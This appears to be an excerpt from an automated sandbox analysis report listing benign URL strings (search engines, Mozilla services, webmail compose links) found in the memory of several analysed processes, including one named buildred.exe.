Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003077000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E47000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003077000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E47000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://content.cdn.mozilla.net
Source: firefox.exe, 00000028.00000002.2882551286.000002618E6AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 00000028.00000002.2882551286.000002618E6AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E30000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2879465068.0000026181E0D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2802994667.000002619243D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2946154664.00000DD94BB04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2804346319.000002619245F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895161216.0000026191D70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000028.00000002.2946900906.00002887A0504000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003077000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E47000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003077000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E47000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabS
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003077000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E47000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 00000028.00000002.2903042607.0000026192673000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2896637347.0000026191F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000028.00000002.2903042607.0000026192673000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EBD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 00000028.00000002.2890262949.000002618F240000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsor
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/recordsjar:f
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1clearCache/this._cacheEntryPromise
Source: firefox.exe, 00000028.00000002.2895347761.0000026191ED4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2947331057.00002FA5DCF04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2889124341.000002618F1B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.00000261907C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2889124341.000002618F1FB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 00000028.00000002.2902841572.0000026192503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/
Source: firefox.exe, 00000028.00000003.2783596675.0000026192200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2802994667.000002619243D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2804346319.000002619245F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895161216.0000026191D70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881The
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 00000028.00000002.2882551286.000002618E6AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000028.00000002.2893311405.00000261907D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 00000028.00000002.2879465068.0000026181EDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2913407729.0000026192ECC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 00000028.00000002.2913407729.0000026192ECC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%The
Source: firefox.exe, 00000028.00000002.2913407729.0000026192E9D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2919430058.0000026193BAA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000028.00000002.2889124341.000002618F1C4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2902841572.0000026192521000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2903042607.0000026192673000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EBD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000028.00000002.2903042607.0000026192673000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2896637347.0000026191F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 00000028.00000002.2903042607.0000026192673000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2896637347.0000026191F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 00000028.00000002.2879465068.0000026181EDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDA72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestinitializeShowSearchSuggestionsFirstPref/matchGrou
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 00000028.00000002.2889124341.000002618F1B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com_migrateXULStoreForDocumentbookmarksToolbarWasVisibledevice-connected-not
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mzl.la/3NS9KJd
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 00000028.00000002.2903042607.0000026192673000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EBD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
